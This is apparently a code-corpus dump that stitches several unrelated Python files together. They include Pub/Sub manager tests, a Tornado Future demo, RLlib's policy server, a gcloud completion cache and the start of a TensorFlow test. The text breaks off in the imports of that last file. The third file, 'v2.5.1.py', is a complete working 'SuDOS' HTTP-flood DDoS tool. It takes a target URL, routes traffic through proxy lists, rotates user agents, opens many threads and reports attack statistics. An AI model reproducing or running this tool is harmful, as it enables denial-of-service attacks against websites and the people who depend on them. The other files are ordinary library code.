            ),
        ]
    )
    # Make leaser with zero initial messages, so we don't test lease management
    # behavior.
    fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=10)
    # Actually run the method and prove that modack and schedule are called in
    # the expected way.
    manager._on_response(response)
    # All messages should be added to the lease management and have their ACK
    # deadline extended, even those not dispatched to callbacks.
    dispatcher.modify_ack_deadline.assert_called_once_with(
        [
            requests.ModAckRequest("fack", 10),
            requests.ModAckRequest("back", 10),
            requests.ModAckRequest("zack", 10),
        ]
    )
    # The first two messages should be scheduled, The third should be put on
    # hold because it's blocked by the completion of the second, which has the
    # same ordering key.
    schedule_calls = scheduler.schedule.mock_calls
    assert len(schedule_calls) == 2
    call_args = schedule_calls[0][1]
    assert call_args[0] == mock.sentinel.callback
    assert isinstance(call_args[1], message.Message)
    assert call_args[1].message_id == "1"
    call_args = schedule_calls[1][1]
    assert call_args[0] == mock.sentinel.callback
    assert isinstance(call_args[1], message.Message)
    assert call_args[1].message_id == "2"
    # Message 3 should have been put on hold.
    assert manager._messages_on_hold.size == 1
    # No messages available because message 2 (with "key1") has not completed yet.
    assert manager._messages_on_hold.get() is None
    # Complete message 2 (with "key1").
    manager.activate_ordering_keys(["key1"])
    # Completing message 2 should release message 3.
    schedule_calls = scheduler.schedule.mock_calls
    assert len(schedule_calls) == 3
    call_args = schedule_calls[2][1]
    assert call_args[0] == mock.sentinel.callback
    assert isinstance(call_args[1], message.Message)
    assert call_args[1].message_id == "3"
    # No messages available in the queue.
    assert manager._messages_on_hold.get() is None
def test__should_recover_true():
    """Transient UNAVAILABLE errors are considered recoverable."""
    manager = make_manager()
    exc = exceptions.ServiceUnavailable("UNAVAILABLE. Service taking nap.")
    assert manager._should_recover(exc) is True
def test__should_recover_false():
    """Non-API errors are not recoverable."""
    manager = make_manager()
    assert manager._should_recover(TypeError("wahhhhhh")) is False
def test__should_terminate_true():
    """A Cancelled error terminates the stream for good."""
    manager = make_manager()
    exc = exceptions.Cancelled("Cancelled. Go away, before I taunt you a second time.")
    assert manager._should_terminate(exc) is True
def test__should_terminate_false():
    """Non-API errors do not terminate the stream."""
    manager = make_manager()
    assert manager._should_terminate(TypeError("wahhhhhh")) is False
@mock.patch("threading.Thread", autospec=True)
def test__on_rpc_done(thread):
    """A stream-terminating error triggers shutdown on a background thread."""
    manager = make_manager()
    manager._on_rpc_done(mock.sentinel.error)
    thread.assert_called_once_with(
        name=mock.ANY, target=manager._shutdown, kwargs={"reason": mock.ANY}
    )
    _, kwargs = thread.call_args
    reason = kwargs["kwargs"]["reason"]
    assert isinstance(reason, Exception)
    assert reason.args == (mock.sentinel.error,)  # Exception wraps the original error
def test_activate_ordering_keys():
    """activate_ordering_keys() is forwarded to the messages-on-hold tracker."""
    manager = make_manager()
    manager._messages_on_hold = mock.create_autospec(
        messages_on_hold.MessagesOnHold, instance=True
    )
    manager.activate_ordering_keys(["key1", "key2"])
    manager._messages_on_hold.activate_ordering_keys.assert_called_once_with(
        ["key1", "key2"], mock.ANY
    )
def test_activate_ordering_keys_stopped_scheduler():
    """With no scheduler (manager shut down), key activation is a no-op."""
    manager = make_manager()
    manager._messages_on_hold = mock.create_autospec(
        messages_on_hold.MessagesOnHold, instance=True
    )
    manager._scheduler = None
    manager.activate_ordering_keys(["key1", "key2"])
    manager._messages_on_hold.activate_ordering_keys.assert_not_called()
|
ct.py | #!/usr/bin/env python
# coding=utf-8
import time
import threading
import tornado.ioloop
from tornado.concurrent import Future
ioloop = tornado.ioloop.IOLoop.current()
def long_task(future, sec=5):
    """Simulate a blocking job, then resolve *future* with a status message."""
    print("long task start")
    time.sleep(sec)
    print("after sleep")
    outcome = "long task done in %s sec" % sec
    future.set_result(outcome)
def after_task_done(future):
    """IOLoop completion callback: announce the task finished, print its result."""
    print("task done")
    outcome = future.result()
    print(outcome)
def test_future():
    # Run the blocking job on a worker thread so the IOLoop stays responsive,
    # then let the loop invoke after_task_done once the future resolves.
    future = Future()
    threading.Thread(target=long_task, args=(future,)).start()
    ioloop.add_future(future, after_task_done)
if __name__ == "__main__":
    # Schedule the demo on the loop, then start it (blocks forever).
    ioloop.add_callback(test_future)
    ioloop.start()
|
v2.5.1.py | #!/usr/bin/env python
#version: 2.5.1 beta
import threading
import argparse
import random
import atexit
import socket
import socks
import time
import ssl
import sys
import os
start_time = 0
active_connections = 0
connection_limit = 0
active_threads = 0
max_threads = 100
delay = 1
ups = 0
total_ups = 0
dps = 0
total_dps = 0
hrs = 0
total_hrs = 0
total_connected = 0
RED = "\u001b[31;1m"
GREEN = "\u001b[32;1m"
YELLOW = "\u001b[33;1m"
BLUE = "\u001b[34;1m"
RESET = "\u001b[0;0m"
user_agents = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:27.0) Gecko/20100101 Firefox/27.0",
"AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:5.0.1) ",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.7.0; U; Edition MacAppStore; en) ",
"Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/534.34 (KHTML,like Gecko) PhantomJS/1.9.0 (development) Safari/534.34",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2)"
]
def sudos(url, **kwargs):
try:
global active_threads
global active_connections
global hrs
global total_hrs
global total_connected
global dps
global total_dps
global ups
global total_ups
active_threads += 1
connected = False
proxy_type = kwargs.get("proxy_type")
proxy_host = kwargs.get("proxy_host")
proxy_port = kwargs.get("proxy_port")
receive_http = kwargs.get("receive_http")
url_dict = url_split(url)
if not url_dict:
print(f"sudos error: invalid url")
return
protocol = url_dict["protocol"]
host = url_dict["domain"]
port = url_dict["port"]
path = url_dict["path"]
parameters = url_dict["parameters"]
if proxy_host:
if not proxy_type:
print(f"sudos error: missing proxy type")
return
elif not proxy_port:
print(f"sudos error: missing proxy port")
return
try:
proxy_port = int(proxy_port)
except ValueError:
print(f"sudos error: unable to convert proxy port to integer")
return
if proxy_host:
sock = socks.socksocket()
sock.set_proxy(proxy_type, proxy_host, proxy_port)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
connected = True
active_connections += 1
total_connected += 1
if protocol == "https":
context = ssl.create_default_context()
sock = context.wrap_socket(sock, server_hostname=host)
if parameters:
parameters = f"&{parameters}"
else:
parameters = ""
while True:
if active_connections < connection_limit:
continue
anti_cache = rand_chars(77)
user_agent = random.choice(user_agents)
http = f"GET {path}?{anti_cache}{parameters} HTTP/1.1\r\nHost: {host}\r\nUser-Agent: {user_agent}\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.5\r\nCache-Control: max-age=0\r\nConnection: keep-alive\r\nDNT: 1\r\nUpgrade-Insecure-Requests: 1\r\n\r\n"
up = sock.send(http.encode())
ups += up
total_ups += up
hrs += 1
total_hrs += 1
if receive_http:
while True:
receive = sock.recv(1024)
download = len(receive)
dps += download
total_dps += download
if download < 1024:
break
time.sleep(delay)
except Exception as e:
#print(f"sudos error: {e}")
pass
finally:
active_threads -= 1
if connected:
active_connections -= 1
def clear_console():
if sys.platform == "linux":
os.system("clear")
elif sys.platform == "win32":
os.system("cls")
def rand_chars(length):
chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
chars_list = list(chars)
rand_text = random.choices(chars_list, k=length)
text = "".join(rand_text)
return text
def separate(separator_length, string):
separator = " " * separator_length
string = str(string)
return separator[len(string):]
def verbose():
try:
global hrs
global dps
global ups
while True:
print(f"Threads: {GREEN}{active_threads}{RESET} {separate(5, active_threads)} Connections: {GREEN}{active_connections}{RESET} {separate(5, active_connections)} HR/s: {GREEN}{hrs}{RESET} {separate(5, hrs)} D/s: {GREEN}{dps}{RESET} {separate(12, dps)} U/s {GREEN}{ups}{RESET}")
hrs = 0
dps = 0
ups = 0
time.sleep(1)
except Exception:
pass
def url_split(url):
try:
try:
protocol, url = url.split("://", 1)
except ValueError:
return
try:
domain, path = url.split("/", 1)
except ValueError:
domain = url
path = ""
try:
domain, port = domain.split(":", 1)
except ValueError:
if protocol == "https":
port = 443
else:
port = 80
port = int(port)
try:
path, parameters = path.split("?", 1)
except ValueError:
parameters = None
path = f"/{path}"
url_dict = {}
url_dict["protocol"] = protocol
url_dict["domain"] = domain
url_dict["port"] = port
url_dict["path"] = path
url_dict["parameters"] = parameters
return url_dict
except Exception:
return
def bytecount(bytesize):
total = f"{bytesize} B"
if bytesize >= 1000:
total = bytesize / 1000
total = f"{total:.2f} kB"
if bytesize >= 1000000:
total = bytesize / 1000000
total = f"{total:.2f} MB"
if bytesize >= 1000000000:
total = bytesize / 1000000000
total = f"{total:.2f} GB"
if bytesize >= 1000000000000:
total = bytesize / 1000000000000
total = f"{total:.2f} TB"
return total
def onexit():
attack_duration = time.time() - start_time
attack_duration = f"{attack_duration:.2f}"
total_download = bytecount(total_dps)
total_upload = bytecount(total_ups)
print(f"\r\nTotal Requests: {total_hrs}\r\nTotal Connected: {total_connected}\r\nTotal Download: {total_download}\r\nTotal Upload: {total_upload}\r\n\r\nAttack Duration: {attack_duration} seconds")
def main():
try:
global max_threads
global delay
global connection_limit
global start_time
parser = argparse.ArgumentParser(description="SuDOS, powerful layer 7 proxy-based DDoS tool.")
parser.add_argument("-t", "--threads", type=int, default=100, metavar="INT", help="Max thread count")
parser.add_argument("-z", "--proxy-type", choices=["http", "socks4", "socks5"], metavar="PROXYTYPE", help="Proxy list type")
parser.add_argument("-x", "--proxy-list", metavar="PROXYFILE", help="Proxy list file")
parser.add_argument("-c", "--timeout", type=int, default=5, metavar="TIMEOUT", help="Socket connection timeout")
parser.add_argument("-v", "--delay", type=int, default=1, metavar="DELAY", help="Timeout per HTTP request")
parser.add_argument("-b", "--connection-limit", type=int, metavar="INT", help="Connected socket count before flooding the target server")
parser.add_argument("-n", "--receive-http", action="store_true", help="Whether to receive HTTP response or not")
parser.add_argument("url", nargs="?", metavar="URL", help="Target URL including protocol, domain and port for particular use")
args = parser.parse_args()
max_threads = args.threads
proxy_type = args.proxy_type
proxy_list = args.proxy_list
timeout = args.timeout
receive_http = args.receive_http
url = args.url
if not url:
print(f"ERROR: URL is required")
parser.print_usage()
sys.exit()
socket.setdefaulttimeout(timeout)
delay = args.delay
if args.connection_limit:
connection_limit = args.connection_limit
if not url_split(url):
print(f"ERROR: Invalid URL")
sys.exit()
if proxy_list:
if not proxy_type:
print(f"ERROR: Proxy type is missing")
sys.exit()
try:
proxy_list = open(proxy_list, "r")
proxies = proxy_list.readlines()
proxy_list.close()
except FileNotFoundError:
print(f"ERROR: Proxy list file not found")
sys.exit()
except Exception:
print(f"ERROR: Invalid proxy list file")
sys.exit()
proxy_type = proxy_type.upper()
proxy_type = getattr(socks, proxy_type)
atexit.register(onexit)
threading.Thread(target=verbose, daemon=True).start()
start_time = time.time()
clear_console()
if proxy_list:
while True:
for proxy in proxies:
proxy = proxy.strip()
try:
proxy_host, proxy_port = proxy.split(":")
except Exception:
continue
try:
proxy_port = int(proxy_port)
except Exception:
continue
while True:
if active_threads >= max_threads:
continue
threading.Thread(target=sudos, args=[url], kwargs={"proxy_type": proxy_type, "proxy_host": proxy_host, "proxy_port": proxy_port, "receive_http": receive_http}, daemon=True).start()
break
else:
while True:
if active_threads >= max_threads:
continue
threading.Thread(target=sudos, args=[url], daemon=True).start()
except KeyboardInterrupt:
sys.exit()
except Exception as e:
print(f"main error: {e}")
pass
if __name__ == "__main__":
main()
|
policy_server_input.py | from http.server import HTTPServer, SimpleHTTPRequestHandler
import logging
import queue
from socketserver import ThreadingMixIn
import threading
import time
import traceback
from typing import List
import ray.cloudpickle as pickle
from ray.rllib.env.policy_client import (
_create_embedded_rollout_worker,
Commands,
)
from ray.rllib.offline.input_reader import InputReader
from ray.rllib.policy.sample_batch import SampleBatch
from ray.rllib.utils.annotations import override, PublicAPI
from ray.rllib.evaluation.metrics import RolloutMetrics
from ray.rllib.evaluation.sampler import SamplerInput
from ray.rllib.utils.typing import SampleBatchType
logger = logging.getLogger(__name__)
class PolicyServerInput(ThreadingMixIn, HTTPServer, InputReader):
    """REST policy server that acts as an offline data source.

    This launches a multi-threaded server that listens on the specified host
    and port to serve policy requests and forward experiences to RLlib. For
    high performance experience collection, it implements InputReader.

    For an example, run `examples/serving/cartpole_server.py` along
    with `examples/serving/cartpole_client.py --inference-mode=local|remote`.

    Examples:
        >>> import gym
        >>> from ray.rllib.algorithms.pg import PGTrainer
        >>> from ray.rllib.env.policy_client import PolicyClient
        >>> from ray.rllib.env.policy_server_input import PolicyServerInput
        >>> addr, port = ...  # doctest: +SKIP
        >>> pg = PGTrainer(  # doctest: +SKIP
        ...     env="CartPole-v0", config={  # doctest: +SKIP
        ...         "input": lambda io_ctx:  # doctest: +SKIP
        ...             PolicyServerInput(io_ctx, addr, port),  # doctest: +SKIP
        ...         # Run just 1 server, in the trainer.
        ...         "num_workers": 0,  # doctest: +SKIP
        ...     }  # doctest: +SKIP
        >>> while True:  # doctest: +SKIP
        >>>     pg.train()  # doctest: +SKIP
        >>> client = PolicyClient(  # doctest: +SKIP
        ...     "localhost:9900", inference_mode="local")
        >>> eps_id = client.start_episode()  # doctest: +SKIP
        >>> env = gym.make("CartPole-v0")
        >>> obs = env.reset()
        >>> action = client.get_action(eps_id, obs)  # doctest: +SKIP
        >>> reward = env.step(action)[0]  # doctest: +SKIP
        >>> client.log_returns(eps_id, reward)  # doctest: +SKIP
        >>> client.log_returns(eps_id, reward)  # doctest: +SKIP
    """

    @PublicAPI
    def __init__(self, ioctx, address, port, idle_timeout=3.0):
        """Create a PolicyServerInput.

        This class implements rllib.offline.InputReader, and can be used with
        any Trainer by configuring

        {"num_workers": 0,
         "input": lambda ioctx: PolicyServerInput(ioctx, addr, port)}

        Note that by setting num_workers: 0, the trainer will only create one
        rollout worker / PolicyServerInput. Clients can connect to the launched
        server using rllib.env.PolicyClient.

        Args:
            ioctx (IOContext): IOContext provided by RLlib.
            address (str): Server addr (e.g., "localhost").
            port (int): Server port (e.g., 9900).
            idle_timeout (float): Seconds between heart-beat insertions of an
                empty SampleBatch onto the samples queue.
        """
        self.rollout_worker = ioctx.worker
        self.samples_queue = queue.Queue()
        self.metrics_queue = queue.Queue()
        self.idle_timeout = idle_timeout
        # Forwards client-reported metrics directly into the local rollout
        # worker.
        if self.rollout_worker.sampler is not None:
            # This is a bit of a hack since it is patching the get_metrics
            # function of the sampler.
            def get_metrics():
                # Drain the metrics queue non-blockingly.
                completed = []
                while True:
                    try:
                        completed.append(self.metrics_queue.get_nowait())
                    except queue.Empty:
                        break
                return completed
            self.rollout_worker.sampler.get_metrics = get_metrics
        else:
            # If there is no sampler, act like if there would be one to collect
            # metrics from
            class MetricsDummySampler(SamplerInput):
                """This sampler only maintains a queue to get metrics from."""
                def __init__(self, metrics_queue):
                    """Initializes an AsyncSampler instance.

                    Args:
                        metrics_queue: A queue of metrics
                    """
                    self.metrics_queue = metrics_queue
                def get_data(self) -> SampleBatchType:
                    raise NotImplementedError
                def get_extra_batches(self) -> List[SampleBatchType]:
                    raise NotImplementedError
                def get_metrics(self) -> List[RolloutMetrics]:
                    """Returns metrics computed on a policy client rollout worker."""
                    completed = []
                    while True:
                        try:
                            completed.append(self.metrics_queue.get_nowait())
                        except queue.Empty:
                            break
                    return completed
            self.rollout_worker.sampler = MetricsDummySampler(self.metrics_queue)
        # Create a request handler that receives commands from the clients
        # and sends data and metrics into the queues.
        handler = _make_handler(
            self.rollout_worker, self.samples_queue, self.metrics_queue
        )
        try:
            # NOTE(review): ``time`` is already imported at module scope; this
            # local re-import plus the 1s sleep looks like leftover debug /
            # port-rebind backoff — confirm whether the delay is intentional.
            import time
            time.sleep(1)
            HTTPServer.__init__(self, (address, port), handler)
        except OSError:
            print(f"Creating a PolicyServer on {address}:{port} failed!")
            import time
            time.sleep(1)
            raise
        logger.info(
            "Starting connector server at " f"{self.server_name}:{self.server_port}"
        )
        # Start the serving thread, listening on socket and handling commands.
        serving_thread = threading.Thread(name="server", target=self.serve_forever)
        serving_thread.daemon = True
        serving_thread.start()
        # Start a dummy thread that puts empty SampleBatches on the queue, just
        # in case we don't receive anything from clients (or there aren't
        # any). The latter would block sample collection entirely otherwise,
        # even if other workers' PolicyServerInput receive incoming data from
        # actual clients.
        heart_beat_thread = threading.Thread(
            name="heart-beat", target=self._put_empty_sample_batch_every_n_sec
        )
        heart_beat_thread.daemon = True
        heart_beat_thread.start()

    @override(InputReader)
    def next(self):
        # Blocks until a batch (possibly an empty heart-beat batch) arrives.
        return self.samples_queue.get()

    def _put_empty_sample_batch_every_n_sec(self):
        # Places an empty SampleBatch every `idle_timeout` seconds onto the
        # `samples_queue`. This avoids hanging of all RolloutWorkers parallel
        # to this one in case this PolicyServerInput does not have incoming
        # data (e.g. no client connected).
        while True:
            time.sleep(self.idle_timeout)
            self.samples_queue.put(SampleBatch())
def _make_handler(rollout_worker, samples_queue, metrics_queue):
    """Build the HTTP request handler class used by PolicyServerInput.

    Args:
        rollout_worker: Local RolloutWorker holding the serving policy state.
        samples_queue: Queue receiving client-reported SampleBatches.
        metrics_queue: Queue receiving client-reported rollout metrics.

    Returns:
        A SimpleHTTPRequestHandler subclass bound to the given worker/queues.
    """
    # Only used in remote inference mode. We must create a new rollout worker
    # then since the original worker doesn't have the env properly wrapped in
    # an ExternalEnv interface.
    child_rollout_worker = None
    inference_thread = None
    lock = threading.Lock()

    def setup_child_rollout_worker():
        # Lazily create the embedded rollout worker (exactly once, under lock).
        nonlocal lock
        with lock:
            nonlocal child_rollout_worker
            nonlocal inference_thread
            if child_rollout_worker is None:
                (
                    child_rollout_worker,
                    inference_thread,
                ) = _create_embedded_rollout_worker(
                    rollout_worker.creation_args(), report_data
                )
                child_rollout_worker.set_weights(rollout_worker.get_weights())

    def report_data(data):
        # Forward a client-reported batch and metrics into the queues, then
        # refresh the child worker's weights from the serving worker.
        nonlocal child_rollout_worker
        batch = data["samples"]
        batch.decompress_if_needed()
        samples_queue.put(batch)
        for rollout_metric in data["metrics"]:
            metrics_queue.put(rollout_metric)
        if child_rollout_worker is not None:
            child_rollout_worker.set_weights(
                rollout_worker.get_weights(), rollout_worker.get_global_vars()
            )

    class Handler(SimpleHTTPRequestHandler):
        def __init__(self, *a, **kw):
            super().__init__(*a, **kw)

        def do_POST(self):
            # Bug fix: default the *header lookup* to 0 instead of passing 0
            # as the ``base`` argument of int(). The previous form
            # ``int(self.headers.get("Content-Length"), 0)`` raised TypeError
            # whenever the Content-Length header was absent (get() returned
            # None) and parsed present values with base auto-detection.
            content_len = int(self.headers.get("Content-Length", 0))
            raw_body = self.rfile.read(content_len)
            # NOTE: pickle.loads on network input is only safe because clients
            # are trusted RLlib PolicyClients on a controlled network.
            parsed_input = pickle.loads(raw_body)
            try:
                response = self.execute_command(parsed_input)
                self.send_response(200)
                self.end_headers()
                self.wfile.write(pickle.dumps(response))
            except Exception:
                # Surface the full traceback to the client for debugging.
                self.send_error(500, traceback.format_exc())

        def execute_command(self, args):
            """Dispatch one client command dict and return the response dict."""
            command = args["command"]
            response = {}
            # Local inference commands:
            if command == Commands.GET_WORKER_ARGS:
                logger.info("Sending worker creation args to client.")
                response["worker_args"] = rollout_worker.creation_args()
            elif command == Commands.GET_WEIGHTS:
                logger.info("Sending worker weights to client.")
                response["weights"] = rollout_worker.get_weights()
                response["global_vars"] = rollout_worker.get_global_vars()
            elif command == Commands.REPORT_SAMPLES:
                logger.info(
                    "Got sample batch of size {} from client.".format(
                        args["samples"].count
                    )
                )
                report_data(args)
            # Remote inference commands:
            elif command == Commands.START_EPISODE:
                setup_child_rollout_worker()
                assert inference_thread.is_alive()
                response["episode_id"] = child_rollout_worker.env.start_episode(
                    args["episode_id"], args["training_enabled"]
                )
            elif command == Commands.GET_ACTION:
                assert inference_thread.is_alive()
                response["action"] = child_rollout_worker.env.get_action(
                    args["episode_id"], args["observation"]
                )
            elif command == Commands.LOG_ACTION:
                assert inference_thread.is_alive()
                child_rollout_worker.env.log_action(
                    args["episode_id"], args["observation"], args["action"]
                )
            elif command == Commands.LOG_RETURNS:
                assert inference_thread.is_alive()
                # The `done` flag changes the log_returns() arity.
                if args["done"]:
                    child_rollout_worker.env.log_returns(
                        args["episode_id"], args["reward"], args["info"], args["done"]
                    )
                else:
                    child_rollout_worker.env.log_returns(
                        args["episode_id"], args["reward"], args["info"]
                    )
            elif command == Commands.END_EPISODE:
                assert inference_thread.is_alive()
                child_rollout_worker.env.end_episode(
                    args["episode_id"], args["observation"]
                )
            else:
                raise ValueError("Unknown command: {}".format(command))
            return response

    return Handler
|
remote_completion.py | # Copyright 2014 Google Inc. All Rights Reserved.
"""Remote resource completion and caching."""
import logging
import os
import threading
import time
import argcomplete
from googlecloudsdk.core import config
from googlecloudsdk.core import properties
class CompletionProgressTracker(object):
    """A context manager for telling the user about long-running completions."""

    # Spinner glyphs cycled by Tick(); each write is followed by '\b' so the
    # spinner overwrites itself in place.
    SPIN_MARKS = [
        '|',
        '/',
        '-',
        '\\',
    ]

    def __init__(self, ofile, timeout=3.0, autotick=True):
        # ofile: stream the spinner is written to.
        # timeout: seconds before the tracker gives up (see Ticker below).
        # autotick: if True, spin from a background thread instead of
        #   requiring manual Tick() calls.
        self._ticks = 0
        self._autotick = autotick
        self._done = False
        self._lock = threading.Lock()
        self.ofile = ofile
        self.timeout = timeout

    def __enter__(self):
        if self._autotick:

            def Ticker():
                # Initial grace period before polling starts.
                time.sleep(.2)
                self.timeout -= .2
                while True:
                    if self.timeout < 0:
                        # Out of time: show '?' and SIGTERM (15) the whole
                        # process group (pid 0 == current group) to abort the
                        # stuck completion.
                        self.ofile.write('?\b')
                        self.ofile.flush()
                        os.kill(0, 15)
                    time.sleep(.1)
                    self.timeout -= .1
                    # Tick() returns True once __exit__ set _done, which
                    # lets this (non-daemon) thread terminate.
                    if self.Tick():
                        return

            threading.Thread(target=Ticker).start()
        return self

    def Tick(self):
        """Give a visual indication to the user that some progress has been made."""
        with self._lock:
            if not self._done:
                self._ticks += 1
                self.ofile.write(
                    CompletionProgressTracker.SPIN_MARKS[
                        self._ticks % len(CompletionProgressTracker.SPIN_MARKS)] + '\b')
                self.ofile.flush()
            return self._done

    def __exit__(self, unused_type=None, unused_value=True,
                 unused_traceback=None):
        # Erase the spinner and mark completion so the Ticker thread exits.
        with self._lock:
            self.ofile.write(' \b')
            self._done = True
class RemoteCompletion(object):
    """Class to cache the names of remote resources."""

    # Diagnostic hit/try counters, shared across all instances.
    CACHE_HITS = 0
    CACHE_TRIES = 0
    _TIMEOUTS = {  # Timeouts for resources in seconds
        'sql.instances': 600,
        'compute.instances': 600,
        'compute.regions': 3600*10,
        'compute.zones': 3600*10
    }
    # How to extract a completion string from one listed item, keyed by the
    # top-level command group (compute items index like dicts; sql items
    # expose an `.instance` attribute).
    ITEM_NAME_FUN = {
        'compute': lambda item: item['name'],
        'sql': lambda item: item.instance
    }

    def __init__(self):
        """Set the cache directory."""
        try:
            self.project = properties.VALUES.core.project.Get(required=True)
        except Exception:  # pylint:disable=broad-except
            # No configured project: 0 is falsy, which disables caching in
            # CachePath()/GetFromCache().
            self.project = 0
        self.cache_dir = config.Paths().completion_cache_dir

    def ResourceIsCached(self, resource):
        """Returns True for resources that can be cached.

        Args:
          resource: The resource as subcommand.resource.

        Returns:
          True when resource is cacheable.
        """
        if resource == 'sql.instances':
            return True
        if resource.startswith('compute.'):
            return True
        return False

    def CachePath(self, resource, zoneregion):
        """Creates a pathname for the resource.

        Args:
          resource: The resource as subcommand.resource.
          zoneregion: The zone or region name.

        Returns:
          Returns a pathname for the resource.
        """
        # Layout: <cache_dir>/<resource>/<project>[/<zoneregion>].
        if self.project:
            path = os.path.join(self.cache_dir, resource, self.project)
        else:
            # Falsy sentinel: callers treat 0 as "caching unavailable".
            return 0
        if zoneregion:
            path = os.path.join(path, zoneregion)
        return path

    def GetFromCache(self, resource, zoneregion=None):
        """Return a list of names for the resource and zoneregion.

        Args:
          resource: The resource as subcommand.resource.
          zoneregion: The zone or region name or None.

        Returns:
          Returns a list of names if in the cache.
        """
        options = []
        RemoteCompletion.CACHE_TRIES += 1
        fpath = self.CachePath(resource, zoneregion)
        if not fpath:
            return None
        try:
            # StoreInCache() sets the file's mtime into the future; an mtime
            # already in the past means the entry expired.
            if os.path.getmtime(fpath) > time.time():
                with open(fpath, 'r') as f:
                    line = f.read().rstrip('\n')
                    options = line.split(' ')
                RemoteCompletion.CACHE_HITS += 1
                return options
        except Exception:  # pylint:disable=broad-except
            # Missing/unreadable cache file is an ordinary miss.
            return None
        return None

    def StoreInCache(self, resource, options, zoneregion):
        """Return the list of names for the resource and zoneregion.

        Args:
          resource: The resource as subcommand.resource.
          options: A list of possible completions.
          zoneregion: The zone or region name, or None if no zone or region.

        Returns:
          None
        """
        path = self.CachePath(resource, zoneregion)
        if not path:
            return
        if not zoneregion and os.path.isdir(path):
            # A previous all-zones listing left a directory here; clear it so
            # a flat file can take its place.
            name = os.path.join(path, '_ALL_ZONES')
            try:
                os.remove(name)
            except OSError:
                pass
            os.rmdir(path)
        dirname = os.path.dirname(path)
        if not os.path.isdir(dirname):
            os.makedirs(dirname)
        if options:
            with open(path, 'w') as f:
                f.write(' '.join(options) + '\n')
        now = time.time()
        if options is None:
            timeout = 0
        else:
            timeout = RemoteCompletion._TIMEOUTS.get(resource, 300)
        # Expiry is encoded as a future mtime (see GetFromCache).
        # NOTE(review): when `options` is falsy no file was written above, so
        # os.utime() can raise OSError on a missing path -- confirm callers
        # tolerate this (RemoteCompleter wraps calls in a broad except).
        os.utime(path, (now, now+timeout))

    @staticmethod
    def GetTickerStream():
        # The argcomplete debug stream is the only safe place for spinner
        # output during completion (stdout feeds the shell).
        return argcomplete.debug_stream

    @staticmethod
    def GetCompleterForResource(resource, cli):
        """Returns a completer function for the give resource.

        Args:
          resource: The resource as subcommand.resource.
          cli: The calliope instance.

        Returns:
          A completer function for the specified resource.
        """

        def RemoteCompleter(parsed_args, **unused_kwargs):
            """Run list command on resource to generates completion options."""
            options = []
            try:
                command = resource.split('.') + ['list']
                zoneregion = None
                if command[0] == 'compute':
                    # '' means "compute resource, zone/region not yet known";
                    # distinct from None (non-compute resource).
                    zoneregion = ''
                    if hasattr(parsed_args, 'zone') and parsed_args.zone:
                        zoneregion = parsed_args.zone
                        command.append('--zone')
                        command.append(zoneregion)
                    if hasattr(parsed_args, 'region') and parsed_args.region:
                        zoneregion = parsed_args.region
                        command.append('--region')
                        command.append(zoneregion)
                ccache = RemoteCompletion()
                if not ccache.project and hasattr(parsed_args, 'project'):
                    ccache.project = parsed_args.project
                options = ccache.GetFromCache(resource, zoneregion)
                if options is None:
                    # Cache miss: run the real `... list` command with user
                    # output suppressed and a spinner on the debug stream.
                    properties.VALUES.core.user_output_enabled.Set(False)
                    ofile = RemoteCompletion.GetTickerStream()
                    with CompletionProgressTracker(ofile):
                        items = list(cli().Execute(command, call_arg_complete=False))
                    fun = RemoteCompletion.ITEM_NAME_FUN[command[0]]
                    options = []
                    allzones = False
                    for item in items:
                        if zoneregion == '':  # pylint:disable=g-explicit-bool-comparison
                            # First item decides: zoned/regional listings are
                            # cached per-zone under an '_ALL_ZONES' key.
                            if 'zone' in item or 'region' in item:
                                zoneregion = '_ALL_ZONES'
                                allzones = True
                                zones = {}
                            else:
                                zoneregion = None
                        options.append(fun(item))
                        if allzones:
                            if 'zone' in item:
                                zone = item['zone']
                            else:
                                zone = item['region']
                            if zone and zone in zones:
                                zones[zone].append(fun(item))
                            elif zone:
                                zones[zone] = [fun(item)]
                    if allzones:
                        for zone in zones:
                            ccache.StoreInCache(resource, zones[zone], zone)
                    ccache.StoreInCache(resource, options, zoneregion)
            except Exception:  # pylint:disable=broad-except
                # Completion must never crash the shell: log and return nothing.
                # NOTE(review): the message lacks a space -- it reads
                # "<resource>completion command failed".
                logging.error(resource + 'completion command failed', exc_info=True)
                return []
            return options

        return RemoteCompleter
|
map_test.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `tf.data.Dataset.map()`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import threading
import time
import warnings
from absl.testing import parameterized
import numpy as np
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_sanitizers
from tensorflow.python.data.kernel_tests import checkpoint_test_base
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import options as options_lib
from tensorflow.python.eager import context
